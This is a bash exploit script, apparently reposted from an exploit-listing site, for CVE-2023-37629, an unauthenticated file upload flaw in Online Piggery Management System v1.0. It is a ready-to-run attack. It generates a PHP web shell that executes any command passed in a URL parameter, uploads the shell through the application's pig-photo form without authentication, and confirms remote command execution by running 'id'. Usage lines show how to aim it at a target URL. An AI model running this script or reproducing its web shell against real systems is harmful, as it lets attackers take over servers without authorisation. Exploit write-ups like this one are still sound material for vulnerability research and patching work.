Share
## https://sploitus.com/exploit?id=PACKETSTORM:173656
#!/bin/bash  
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability  
# Date: July 12 2023  
# Exploit Author: 1337kid  
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html  
# Version: 1.0  
# Tested on: Ubuntu  
# CVE : CVE-2023-37629  
#  
# chmod +x exploit.sh  
# ./exploit.sh web_url  
# ./exploit.sh http://127.0.0.1:8080/  
  
echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ "  
echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\"  
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"  
echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ "  
echo " @1337kid"  
echo   
  
if [[ $1 == '' ]]; then  
echo "No URL specified!"  
exit  
fi  
  
base_url=$1  
  
unauth_file_upload() {  
# CVE-2023-37629 - File upload vuln  
echo "Generating shell.php"  
#===========  
cat > shell.php << EOF  
<?php system(\$_GET['cmd']); ?>  
EOF  
#===========  
echo "done"  
curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null  
req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}')  
if [[ $req == "200" ]]; then  
echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"  
else  
echo "Failed to upload a shell"  
fi  
  
}  
  
req=$(curl -I -s $base_url | head -1 | awk '{print $2}')  
if [[ $req -eq "200" ]]; then  
unauth_file_upload  
else  
echo "Error"  
echo "Status Code: $req"  
fi